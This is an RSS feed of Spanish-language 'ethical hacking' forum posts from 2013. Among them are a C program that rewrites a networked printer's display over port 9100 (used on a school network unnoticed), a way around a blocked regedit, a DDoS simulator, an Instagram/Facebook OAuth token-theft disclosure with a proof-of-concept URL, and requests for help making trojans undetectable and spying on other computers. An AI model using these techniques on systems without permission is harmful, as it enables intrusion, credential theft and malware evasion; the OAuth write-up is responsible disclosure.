<?xml version="1.0" encoding="ISO-8859-1"?>

<rss version="2.0" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:content="http://purl.org/rss/1.0/modules/content/">
	<channel>
		<title>La Comunidad DragonJAR - Hacking Etico</title>
		<link>http://comunidad.dragonjar.org/</link>
		<description />
		<language>es</language>
		<lastBuildDate>Sun, 19 May 2013 02:14:59 GMT</lastBuildDate>
		<generator>vBulletin</generator>
		<ttl>60</ttl>
		<image>
			<url>http://comunidad.dragonjar.org/images/misc/rss.png</url>
			<title>La Comunidad DragonJAR - Hacking Etico</title>
			<link>http://comunidad.dragonjar.org/</link>
		</image>
		<item>
			<title>Hackeando Impresoras</title>
			<link>http://comunidad.dragonjar.org/f152/hackeando-impresoras-14674/</link>
			<pubDate>Wed, 15 May 2013 18:52:14 GMT</pubDate>
			<description>Hola muchachos, antes inizio diciendo que no hay muchas imagenes y puede que no sea claro, por eso intentare de explicar bien. 
Hoy estaba en la...</description>
			<content:encoded><![CDATA[<div><!-- google_ad_section_start -->Hola muchachos, antes inizio diciendo que no hay muchas imagenes y puede que no sea claro, por eso intentare de explicar bien.<br />
Hoy estaba en la escuela conectado a la red wireless, hice un nmap -T Insane -A 192.168.1.0/24, para ver los equipos que estaban conectados a la red y las puertas abiertas.<br />
<br />
Bueno, me aparecio questa IP: 192.168.1.27 con il nombre (Lexmark.. bla bla bla), si es una impresora, con muchos ports abiertos y uno de estos era el 9100.<br />
9100     TCP        PDL Data Stream<br />
<br />
Buscando buscando y googleando y buscando mas, cai en una pagina donde ensenyaban el PJL (Pritner Job Language), con unos codigos. Estos codigos eran unos comandos que enviados a la impresora habrian hecho algo!<br />
Pense pense y pense, y llegue a la conclusion y me dije:<br />
<br />
&quot;Mateo, tu sabes programar en C, haz un programa que te envie ese comando para hacer algo en la impresora no?&quot;<br />
<br />
Y me puse a trabajar, el comando que use fue el de cambiar lo que hay escrito en la impresora (en la pantallita).<br />
<br />
Llegando a este resultado (Me disculpo por la resolucion pero la hice con el celular y no tenia que verme el profesor)<br />
<br />
<img src="http://s2.subirimagenes.com/fotos/previo/thump_843757497194210151518478114.jpg" border="0" alt="" /><br />
<br />
En italiano &quot;PACCHISSIMO&quot; que se pronuncia &quot;PAKKISSIMO&quot; es una cosa mal hecha o con resultados no buenos.<br />
<br />
Ese es el texto ya modificado! A placer obviamente. Ahora les dejo el codigo de mi programita. Pruebenlo y diganme que tal!<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Código:</div>
	<hr /><code class="bbcode_code">//Daxgon<br />
#include &lt;sys/types.h&gt;<br />
#include &lt;sys/socket.h&gt;<br />
#include &lt;netdb.h&gt;<br />
#include &lt;netinet/in.h&gt;<br />
#include &lt;stdio.h&gt;<br />
<br />
#define PORT 9100<br />
<br />
int main (int argc, char *argv[]) {<br />
<br />
&nbsp; int sockfd,len,bytes_sent;<br />
&nbsp; struct hostent *host;<br />
&nbsp; struct sockaddr_in dest_addr;<br />
&nbsp; char line[100];<br />
&nbsp; <br />
&nbsp; if (argc !=3) {<br />
&nbsp; &nbsp; printf(&quot;\tIl messaggio non puo essere piu lungo di 16 caratteri\n&quot;);<br />
&nbsp; &nbsp; exit(1);<br />
&nbsp; }<br />
<br />
&nbsp; if ( (host=gethostbyname(argv[1])) == NULL) {<br />
&nbsp; &nbsp; perror(&quot;La funzione gethostbyname ha prodotto un errore&quot;);<br />
&nbsp; &nbsp; exit(1);<br />
&nbsp; }<br />
<br />
&nbsp; printf (&quot;Stampanti Hack By: Dax\n&quot;);<br />
&nbsp; printf (&quot;Hostname:&nbsp;  %s\n&quot;, argv[1]);<br />
&nbsp; printf (&quot;Messaggio: %s\n&quot;,argv[2]);<br />
<br />
&nbsp; dest_addr.sin_family= host-&gt;h_addrtype;&nbsp; <br />
&nbsp; dest_addr.sin_port= htons(PORT) ;<br />
&nbsp; bcopy(host-&gt;h_addr, (char *) &amp;dest_addr.sin_addr, host-&gt;h_length);<br />
<br />
&nbsp; bzero(&amp;(dest_addr.sin_zero), 8);<br />
&nbsp; <br />
&nbsp; printf (&quot;Socket....\n&quot;);<br />
&nbsp; if ((sockfd=socket(AF_INET,SOCK_STREAM,0)) &lt; 0) {<br />
&nbsp; &nbsp; perror(&quot;Errore con il socket&quot;);<br />
&nbsp; &nbsp; exit(1);<br />
&nbsp; }<br />
<br />
&nbsp; printf (&quot;Connettendo....\n&quot;);<br />
&nbsp; if (connect(sockfd, (struct sockaddr *)&amp;dest_addr,sizeof(dest_addr)) == -1){<br />
&nbsp; &nbsp; perror(&quot;Errore durante la connessione&quot;);<br />
&nbsp; &nbsp; exit(1);}<br />
<br />
&nbsp; //Questo è il codice della stampante<br />
&nbsp; <br />
&nbsp; strcpy(line,&quot;\033%-12345X@PJL RDYMSG DISPLAY = \&quot;&quot;);<br />
&nbsp; strncat(line,argv[2],44);<br />
&nbsp; strcat(line,&quot;\&quot;\r\n\033%-12345X\r\n&quot;);<br />
<br />
<br />
&nbsp; printf (&quot;Inviando dati...%d\n&quot;,strlen(line));<br />
&nbsp; printf (&quot;Linea: %s\n&quot;,line);<br />
&nbsp; bytes_sent=send(sockfd,line,strlen(line),0);<br />
&nbsp; <br />
&nbsp; printf(&quot;Inviati %d bytes\n&quot;,bytes_sent);<br />
&nbsp; close(sockfd);<br />
}</code><hr />
</div>Vi prometto che entro sabado pondre muchas mas imagenes del nmap, asi entenderan mejor!<br />
<br />
Si tienen dudas escribanme!<br />
<br />
Big Up!<br />
<br />
PS. Ahora estoy trabajando en un programa que me controla la impresora desde el computer. Pudiendo manejar todo lo que es posible. Quando este acabado y funcione lo dejare libre<br />
<br />
Ah si, los codigos son estos por si no habian entendido.<br />
<br />
Ec%-12345X@PJL RDYMSG DISPLAY=&quot;MESSAGE&quot;<br />
Ec%-12345X<br />
<br />
Para compilar en Linux:<br />
<br />
gcc -o nombredelarchivofinal nombredelarchivoenc.c<br />
<br />
Y para ejecutar tenes que pasarle 2 argumentos. La IP local de la impresora y el mensaje ES:<br />
<br />
./hackdisplay 192.168.1.27 &quot;Este mensaje se vedra en la pantalla&quot;<br />
<br />
Les dejo tambien este link que contiene muchos codigos PJL en modo de crear nuevos script.<br />
Si les viene en mente uno no teman a publicarlo!<br />
<br />
<a href="http://anonym-url.com/go.php?to=http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=bpl01965" target="_blank">http://h20000.www2.hp.com/bizsupport...ectID=bpl01965</a><!-- google_ad_section_end --></div>

]]></content:encoded>
			<category domain="http://comunidad.dragonjar.org/f152/">Hacking Etico</category>
			<dc:creator>DaXGoN</dc:creator>
			<guid isPermaLink="true">http://comunidad.dragonjar.org/f152/hackeando-impresoras-14674/</guid>
		</item>
		<item>
			<title>Acceder al registro de windows aunque el admin bloqueara regedit.exe</title>
			<link>http://comunidad.dragonjar.org/f152/acceder-al-registro-de-windows-aunque-el-admin-bloqueara-regedit-exe-14672/</link>
			<pubDate>Wed, 15 May 2013 18:32:18 GMT</pubDate>
			<description>En los entornos windows hay muchas formas de hacer la misma cosa y esto dificulta mucho a un administrador el bloquear todas las posibles formas de...</description>
			<content:encoded><![CDATA[<div><!-- google_ad_section_start -->En los entornos windows hay muchas formas de hacer la misma cosa y esto dificulta mucho a un administrador el bloquear todas las posibles formas de acceder a un recurso por un usuario, en esta ocasiona nos ponemos en el papel de un pentester que necesita acceder al registro de windows, pero el admin ha tomado la precaución de impedir la ejecución del regedit.<br />
<br />
lo primero que se nos viene a la mente seria conseguir una copia de regedit de otro equipo, cambiarle el nombre y ejecutarla, pero si esto no funciona, podrías intentar usar este script en visualbasic script que encontre en el blog de <a href="http://anonym-url.com/go.php?to=http://diablohorn.wordpress.com/2013/05/14/vbscript-based-interactive-registry-viewer/" target="_blank">diablohorn</a> que nos permite acceder al registro sin regedit<br />
<br />
<div class="bbcode_container">
	<div class="bbcode_description">Cita:</div>
	<div class="bbcode_quote printable">
		<hr />
		
			C:\&gt;cscript regview.vbs<br />
Microsoft (R) Windows Script Host Version 5.8<br />
Copyright (C) Microsoft Corporation. All rights reserved.<br />
<br />
 help<br />
<br />
help - displays this help<br />
cd  - change to that key<br />
back - go to parent/previous key<br />
ls - list current subkeys<br />
lsv - list current key values<br />
use - root key number to use<br />
        0 - HKEY_CLASSES_ROOT<br />
        1 - HKEY_CURRENT_USER<br />
        2 - HKEY_LOCAL_MACHINE<br />
        3 - HKEY_USERS<br />
        4 - HKEY_CURRENT_CONFIG<br />
<br />
 use<br />
key number: 1<br />
[HKEY_CURRENT_USER\] cd software\vmware, inc.<br />
[HKEY_CURRENT_USER\software\vmware, inc.] ls<br />
VMware Tools<br />
[HKEY_CURRENT_USER\software\vmware, inc.] cd vmware tools<br />
[HKEY_CURRENT_USER\software\vmware, inc.\vmware tools] lsv<br />
[HKEY_CURRENT_USER\software\vmware, inc.\vmware tools] ls<br />
Hgfs Usability<br />
[HKEY_CURRENT_USER\software\vmware, inc.\vmware tools] cd hgfs usability<br />
[HKEY_CURRENT_USER\software\vmware, inc.\vmware tools\hgfs usability] lsv<br />
Entry Name: mappedDriveLetter<br />
        Data Type: String<br />
        Value: z<br />
[HKEY_CURRENT_USER\software\vmware, inc.\vmware tools\hgfs usability] back<br />
[HKEY_CURRENT_USER\software\vmware, inc.\vmware tools] back<br />
[HKEY_CURRENT_USER\software\vmware, inc.] exit
			
		<hr />
	</div>
</div>descargalo y pruebalo ;-)<br />
<a href="http://anonym-url.com/go.php?to=https://github.com/DiabloHorn/DiabloHorn/blob/master/misc/regview.vbs" target="_blank">https://github.com/DiabloHorn/Diablo...sc/regview.vbs</a><!-- google_ad_section_end --></div>

]]></content:encoded>
			<category domain="http://comunidad.dragonjar.org/f152/">Hacking Etico</category>
			<dc:creator>Garbage</dc:creator>
			<guid isPermaLink="true">http://comunidad.dragonjar.org/f152/acceder-al-registro-de-windows-aunque-el-admin-bloqueara-regedit-exe-14672/</guid>
		</item>
		<item>
			<title>Kali Linux</title>
			<link>http://comunidad.dragonjar.org/f152/kali-linux-14669/</link>
			<pubDate>Wed, 15 May 2013 15:44:40 GMT</pubDate>
			<description>Hola a toda la comunidad!: 
Como soy nuevo en esta comunidad, y estoy aprendiendo poco de a poco... 
 Les queria proponer una idea general en que...</description>
			<content:encoded><![CDATA[<div><!-- google_ad_section_start -->Hola a toda la comunidad!:<br />
Como soy nuevo en esta comunidad, y estoy aprendiendo poco de a poco...<br />
 Les queria proponer una idea general en que podamos aportar entre todos.<br />
La idea es desarrollar videostutoriales del SO Kali Linux, como funcionan los programas y demas, una guia para que todos podamos aprender y sobre todo compartir a otros usuarios que deseen aprender tambien. <br />
Hasta luego!<!-- google_ad_section_end --></div>

]]></content:encoded>
			<category domain="http://comunidad.dragonjar.org/f152/">Hacking Etico</category>
			<dc:creator>Ferbetta</dc:creator>
			<guid isPermaLink="true">http://comunidad.dragonjar.org/f152/kali-linux-14669/</guid>
		</item>
		<item>
			<title>BoNeSi – The DDoS Botnet Simulator</title>
			<link>http://comunidad.dragonjar.org/f152/bonesi-ddos-botnet-simulator-14659/</link>
			<pubDate>Sat, 11 May 2013 15:36:57 GMT</pubDate>
			<description><![CDATA[BoNeSi &#8211; The DDoS Botnet Simulator                      Los ataques de denegación de  servicio están a la orden del día. Diversos grupos de...]]></description>
			<content:encoded><![CDATA[<div><!-- google_ad_section_start --><b>BoNeSi &#8211; The DDoS Botnet Simulator</b><br /><br />                      Los ataques de denegación de  servicio están a la orden del día. Diversos grupos de ciber-criminales  los usan para extorsionar a empresas e instituciones entre otros  objetivos. También se sabe del uso de ataques de denegación de servicio  para dejar inoperativos según que servicios en plan de protesta. Hace tiempo vi un software que permitía  simular un ataque de denegación de servicio, de esta manera podremos ver  que impacto causaría en la red. Además permite generar tráfico del  tipo: ICMP, UDP y TCP (HTTP) flooding. Incluso veremos el ataque desde  distintas IP&#8217;s.<br />
<br />
 El software es Open Source y lo podemos bajar de aquí: <a href="http://anonym-url.com/go.php?to=http://bonesi.googlecode.com/files/bonesi-0.2.0.tar.gz" target="_blank">https://code.google.com/p/bonesi/downloads/list</a><br />
 <div style="margin-left:40px"> ./configure make y<br />
 make install.</div>Es sencillo de instalar una vez instalado podemos lanzar un ataque y ver como se vería en la parte de servidor web. En primer lugar lanzamos bonesi con las opciones más básicas.<br />
<br />
<br />
 <div style="text-align: center;"><a href="http://anonym-url.com/go.php?to=http://seifreed.files.wordpress.com/2013/04/1.png" target="_blank"><img src="http://seifreed.files.wordpress.com/2013/04/1.png?w=470&amp;h=230" border="0" alt="" /></a><br />
<br />
</div> Con Bonesi empezamos a lanzar el ataque sobre el servidor deseado.<br />
<br />
 Podremos ver que en el servidor destino el consumo de recursos ha aumentado.<br />
<br />
<br />
 <div style="text-align: center;"><a href="http://seifreed.files.wordpress.com/2013/04/2.png" target="_blank"><img src="http://seifreed.files.wordpress.com/2013/04/2.png?w=470&amp;h=82" border="0" alt="" /><br />
<br />
</a><br />
</div> Si consultamos los archivos de LOG, o bien capturamos en la interfaz local del servidor atacado podremos ver.<br />
<br />
<br />
 <div style="text-align: center;"><a href="http://anonym-url.com/go.php?to=http://seifreed.files.wordpress.com/2013/04/3.png" target="_blank"><img src="http://seifreed.files.wordpress.com/2013/04/3.png?w=470&amp;h=284" border="0" alt="" /></a><br />
<br />
</div> Como simulación este software nos puede ir muy bien.<br />
<br />
 Aunque no haya realizado las pruebas,  Bonesi permite especificar un listado de user-agents para el ataque y de  Ip&#8217;s distintas de origen.<br />
<br />
<div style="text-align: right;"><a href="http://anonym-url.com/go.php?to=http://www.flu-project.com/bonesi-the-ddos-botnet-simulator.html" target="_blank">----&gt;Fuente</a><br />
</div>BladeH: Aquí también le dejo un vídeo donde utilizan esta herramienta para simular un ataque a un servidor y enseña que se necesita para mitigarlos.<br />
<br />
<br />
<br />
<div style="text-align: center;">
<iframe class="restrain" title="YouTube video player" width="640" height="390" src="//www.youtube.com/embed/ocjKGM3PxJI?wmode=opaque" frameborder="0"></iframe>
<br />
</div><!-- google_ad_section_end --></div>

]]></content:encoded>
			<category domain="http://comunidad.dragonjar.org/f152/">Hacking Etico</category>
			<dc:creator>BladeH</dc:creator>
			<guid isPermaLink="true">http://comunidad.dragonjar.org/f152/bonesi-ddos-botnet-simulator-14659/</guid>
		</item>
		<item>
			<title>un vistaso a las vulnerabilidades Instagram</title>
			<link>http://comunidad.dragonjar.org/f152/un-vistaso-las-vulnerabilidades-instagram-14647/</link>
			<pubDate>Wed, 08 May 2013 17:14:14 GMT</pubDate>
			<description>*¿Como hackear las cuenta de instagram? 
 
* 
 
En este post, voy a mostrar cómo fui capaz de hackear cuentas de Instagram a través de...</description>
			<content:encoded><![CDATA[<div><!-- google_ad_section_start --><div style="text-align: center;"><font size="5"><b>¿Como hackear las cuenta de instagram?<br />
<br />
</b></font></div><br />
En este post, voy a mostrar cómo fui capaz de hackear cuentas de Instagram a través de vulnerabilidades de OAuth (Instagram.com / facebook.com).<br />
<br />
Hay básicamente dos maneras de tomar ventaja de Instagram OAuth.<br />
<br />
 <br />
<ol class="decimal"><li style="">Secuestrar cuentas de Instagram Instagram utilizando OAuth (<a href="http://anonym-url.com/go.php?to=https://instagram.com/oauth/authorize/" target="_blank">https://instagram.com/oauth/authorize/</a>)</li><li style="">Secuestrar cuentas de Instagram con Facebook OAuth diálogo (<a href="http://anonym-url.com/go.php?to=https://www.facebook.com/dialog/oauth" target="_blank">https://www.facebook.com/dialog/oauth</a>)</li></ol><br />
 <br />
Ataque con éxito nos permiten acceder a:<br />
<br />
    <br />
<ul><li style="">Fotos privadas</li><li style="">La capacidad de eliminar fotos y editar comentarios</li><li style="">La capacidad de publicar nuevas fotos.</li></ul><br />
 <br />
Porque yo me diversión con Instagram, &quot;me dije a mí mismo:&quot; Tal vez debería comprobar su seguridad? &quot;<br />
<br />
Así que cuando Facebook adquirida Instagram, empecé a comprobar a las vulnerabilidades de seguridad, yo les informé varias vulnerabilidades, incluyendo ataques OAuth, pero la adquisición aún no cerrada y Facebook Seguridad podido poner sus manos sobre los problemas de seguridad, así que esperé, esperé como WhiteHat,<br />
<br />
Más tarde recibí un mensaje de Facebook de Seguridad, dijeron: Ni siquiera ellos podían arreglarlo, todavía quieren pagar estas vulnerabilidades.<br />
<br />
<div style="text-align: center;"><img src="http://www.breaksec.com/wp-content/uploads/2013/05/Aquired.jpg" border="0" alt="" /><br />
</div><br />
<br />
<br />
<br />
Así que les dije: No hay necesidad de pago, eso es porque no podían llevar a cabo controles de seguridad antes de que el cierre de la adquisición,<br />
<br />
Es increíble ver cómo el equipo de seguridad de Facebook ase un gran trabajo en cuanto a su programa de recompensas de errores, incluso que no cierran la adquisición, aún quieren pagar por estas vulnerabilidades.<br />
<br />
Durante la investigación de los parámetros de seguridad de Instagram, me di cuenta de que Facebook Seguridad ha producido algunos resultados impresionantes en cuanto a sus propias vulnerabilidades Instagram OAuth. En esencia, bloquearon el acceso a cualquier y todos los archivos, carpetas y subdominios de validar el parámetro redirect_uri.<br />
<br />
<br />
<img src="http://www.breaksec.com/wp-content/uploads/2013/05/Block-Differnet-domain.jpg" border="0" alt="" /><br />
<br />
<br />
<br />
Además, la redirección sólo se le permitió ir al dominio de aplicación propietario. Eso fue especialmente mala noticia para mí.<br />
<br />
Por lo tanto, tenía que encontrar alguna otra manera de conseguir más allá de su protección. Para complicar aún más el problema era el hecho de que usted no puede utilizar una redirección / XSS en la victima propietaria de la aplicasion. Esto se debe a que no tienen acceso a los archivos o carpetas en el dominio de aplicación dueño a través del parámetro redirect_uri.<br />
<br />
<img src="http://www.breaksec.com/wp-content/uploads/2013/05/Block-Files-Folders.jpg" border="0" alt="" /><br />
<br />
Por ejemplo:<br />
<br />
Permitir solicitud:<br />
<br />
<a href="http://anonym-url.com/go.php?to=https://apigee.com" target="_blank">https://apigee.com</a><br />
<br />
Bloquear solicitudes:<br />
<br />
Redirect_uri = <a href="http://anonym-url.com/go.php?to=https://www.breaksec.com" target="_blank">https://www.breaksec.com</a><br />
<br />
Redirect_uri = <a href="http://anonym-url.com/go.php?to=https://a.apigee.com/" target="_blank">https://a.apigee.com/</a><br />
<br />
Redirect_uri = <a href="http://anonym-url.com/go.php?to=https://apigee.com/x/x.php" target="_blank">https://apigee.com/x/x.php</a><br />
<br />
Redirect_uri = <a href="http://anonym-url.com/go.php?to=https://apigee.com/" target="_blank">https://apigee.com/</a> 23%,? o cualquier signo especial<br />
<br />
En la actualidad, parece que la redirect_uri es invulnerable a los ataques de OAuth.<br />
<br />
Durante la investigación, me encontré con un bypass furtivo. Si el atacante utiliza un truco sufijo en el dominio de la aplicación propietaria, que pueden pasar por alto el Instagram OAuth y luego enviar el código access_token al propietario del dominio.<br />
<br />
Por ejemplo:<br />
<br />
Digamos que mi aplicación client_id en Instagram es 33221863xxx y mi dominio es breaksec.com<br />
<br />
En este caso, el parámetro redirect_uri debe permitir redirección sólo para mi dominio (breaksec.com), ¿no? ¿Qué sucede cuando se cambia el sufijo de dominio a algo así como:<br />
<br />
Breaksec.com.mx<br />
<br />
En este ejemplo, el atacante puede enviar el access_token, el código directamente a breaksec.com.mx. Para que el ataque tenga éxito, por supuesto, el atacante tendrá que comprar el nuevo dominio (en este caso, breaksec.com.mx).<br />
<br />
<img src="http://www.breaksec.com/wp-content/uploads/2013/05/domainavaible.jpg" border="0" alt="" /><br />
<br />
También es posible comprar otros dominios breaksec.com como:<br />
<br />
com.tw<br />
<br />
com.mx<br />
<br />
com.es<br />
<br />
com.co<br />
<br />
com.bz<br />
<br />
com.br<br />
<br />
com.ag<br />
<br />
Bypass PoC (fijado por Facebook Security Team):<br />
<br />
Game Over.<br />
<br />
<br />
<br />
<b>Bug 2.</b><br />
<br />
Con este error, he usado el valor client_id Instagram a través del Facebook OAuth (<a href="http://anonym-url.com/go.php?to=https://www.facebook.com/dialog/oauth" target="_blank">https://www.facebook.com/dialog/oauth</a>).<br />
<br />
Cuando se utiliza la aplicación Instagram, que se puede integrar con Facebook.<br />
<br />
Por ejemplo:<br />
<br />
Cuando un usuario quiere subir sus fotos Instagram a Facebook, permiten esta interacción e integración se lleven a cabo.<br />
<br />
<div style="text-align: center;"><img src="http://www.breaksec.com/wp-content/uploads/2013/05/sharing-option-instagram.png" border="0" alt="" /><br />
</div> <div style="text-align: center;"><img src="http://www.breaksec.com/wp-content/uploads/2013/05/Instagram-Would-like-to-access-your-public-profile-and-friend-list.png" border="0" alt="" /><br />
</div><br />
Para mi sorpresa, descubrí que un atacante puede utilizar <acronym title="Google Page Ranking">pr</acronym>ácticamente en cualquier dominio del redirect_uri, parámetro siguiente. Este fue en realidad una especie de desconcertante y no sé por qué sucedió esto, pero funcionó. Usted, literalmente, puede utilizar cualquier dominio redirect_uri, proximo parámetro a través del redirect_uri en Instagram client_id.<br />
<br />
Esto efectivamente permite al atacante robar el access_token de cualquier usuario de Instagram,<br />
<br />
Con el access_token el atacante será capaz de publicar en el nombre víctima en su cuenta de Facebook, Acceso a su lista de amigos privada.<br />
<br />
PoC (Facebook ya fija este número):<br />
<br />
<a href="http://anonym-url.com/go.php?to=https://www.facebook.com/connect/uiserver.php?app_id=124024574287414&amp;next=http://files.nirgoldshlager.com&amp;display=page&amp;fbconnect=1&amp;method=permissions.request&amp;response_type=token" target="_blank">https://www.facebook.com/connect/uis...nse_type=token</a><br />
<br />
PoC vídeo:<br />
<br />
<br />

<object class="restrain" type="application/x-shockwave-flash" width="640" height="360" data="//vimeo.com/moogaloop.swf?clip_id=65314306">
	<param name="movie" value="//vimeo.com/moogaloop.swf?clip_id=65314306" />
	<param name="wmode" value="opaque" />
	<!--[if IE 6]>
	<embed width="640" height="360" type="application/x-shockwave-flash" src="//vimeo.com/moogaloop.swf?clip_id=65314306" />
	<![endif]--></object>
<br />
<br />
<br />
¡Hasta la <acronym title="Google Page Ranking">pr</acronym>óxima ;)<br />
<br />
Por @ Nirgoldshlager <br />
<div style="text-align: right;"><a href="http://www.breaksec.com/?p=6164" target="_blank"><br />
------&gt;Fuente breaksec.com</a><br />
</div><!-- google_ad_section_end --></div>

]]></content:encoded>
			<category domain="http://comunidad.dragonjar.org/f152/">Hacking Etico</category>
			<dc:creator>BladeH</dc:creator>
			<guid isPermaLink="true">http://comunidad.dragonjar.org/f152/un-vistaso-las-vulnerabilidades-instagram-14647/</guid>
		</item>
		<item>
			<title>ayuda sobre de como hacer indetectable los troyanos</title>
			<link>http://comunidad.dragonjar.org/f152/ayuda-sobre-de-como-hacer-indetectable-los-troyanos-14625/</link>
			<pubDate>Sun, 28 Apr 2013 21:24:24 GMT</pubDate>
			<description>hace mucho tiempo utilizaba backdoors como bifrost, poison yvy... ETC; el problema era que tardaba mucho tiempo buscando crypters modificados, que en...</description>
			<content:encoded><![CDATA[<div><!-- google_ad_section_start -->hace mucho tiempo utilizaba backdoors como bifrost, poison yvy... ETC; el problema era que tardaba mucho tiempo buscando crypters modificados, que en su mayoría de veces no funcionaban o te inyectaban algún otro troyano:mad:.<br />
mi pregunta es: hay algún tutorial que me explique muy bien como realizar o modificar un crypter para hacer indetectables mis server.exe ante los antivirus?<br />
me gustaría mucho aprender sobre esto:confused::confused:.<br />
<br />
tengo conocimientos de varios lenguajes de programación, así que este no seria una dificultad para mi.<br />
<br />
de ante mano gracias.<!-- google_ad_section_end --></div>

]]></content:encoded>
			<category domain="http://comunidad.dragonjar.org/f152/">Hacking Etico</category>
			<dc:creator>wildervv</dc:creator>
			<guid isPermaLink="true">http://comunidad.dragonjar.org/f152/ayuda-sobre-de-como-hacer-indetectable-los-troyanos-14625/</guid>
		</item>
		<item>
			<title>Alguien sabe como crear troyanos?</title>
			<link>http://comunidad.dragonjar.org/f152/alguien-sabe-como-crear-troyanos-14623/</link>
			<pubDate>Sun, 28 Apr 2013 19:04:44 GMT</pubDate>
			<description>Me gustaría saber si hay algún tutorial o alguna guía para crear troyanos para poder ver la información de otra computadora.</description>
			<content:encoded><![CDATA[<div><!-- google_ad_section_start -->Me gustaría saber si hay algún tutorial o alguna guía para crear troyanos para poder ver la información de otra computadora.<!-- google_ad_section_end --></div>

]]></content:encoded>
			<category domain="http://comunidad.dragonjar.org/f152/">Hacking Etico</category>
			<dc:creator>Dilan</dc:creator>
			<guid isPermaLink="true">http://comunidad.dragonjar.org/f152/alguien-sabe-como-crear-troyanos-14623/</guid>
		</item>
		<item>
			<title>Buscando vulnerabilidad por nmap</title>
			<link>http://comunidad.dragonjar.org/f152/buscando-vulnerabilidad-por-nmap-14609/</link>
			<pubDate>Sun, 21 Apr 2013 11:57:42 GMT</pubDate>
			<description>Saludos, soy nuevo en este foro. 
He estado buscando la manera de como conseguir una shellremota, hasta ahora solo estoy probando buscando...</description>
			<content:encoded><![CDATA[<div><!-- google_ad_section_start -->Saludos, soy nuevo en este foro.<br />
He estado buscando la manera de como conseguir una shellremota, hasta ahora solo estoy probando buscando vulnerabilidades en la pc &quot;victima&quot;. Investigue buscando vulnerabilidad con nmap en el servicio smb en mi red Lan y estos fueron los resultados:<br />
<br />
<a href="http://anonym-url.com/go.php?to=http://imageshack.us/photo/my-images/62/dibujomsx.jpg/?sa=0" target="_blank">ImageShack® - Online Photo and Video Hosting</a><br />
<br />
Investigue tambien sobre esas vulnerabilidades que busca el nmap y me di cuenta que son antiguas y pense que ya no estan disponibles por los parches actualizados pero despues probe en otra LAN:<br />
<br />
<a href="http://anonym-url.com/go.php?to=http://imageshack.us/photo/my-images/850/hacl.jpg/" target="_blank">ImageShack® - Online Photo and Video Hosting</a><br />
<br />
El resultado &quot;Likely INFECTED&quot; quiere decir que podria tener acceso a esa pc mediante esa vulnerabilidad en el servicio SMB ?<br />
Estuve investigando en google pero nada encontre, todo en ingles y solo lei que era posible que sea solo un virus.<br />
Espero aportes y seguiré investigando.<!-- google_ad_section_end --></div>

]]></content:encoded>
			<category domain="http://comunidad.dragonjar.org/f152/">Hacking Etico</category>
			<dc:creator>Audioslave</dc:creator>
			<guid isPermaLink="true">http://comunidad.dragonjar.org/f152/buscando-vulnerabilidad-por-nmap-14609/</guid>
		</item>
	</channel>
</rss>
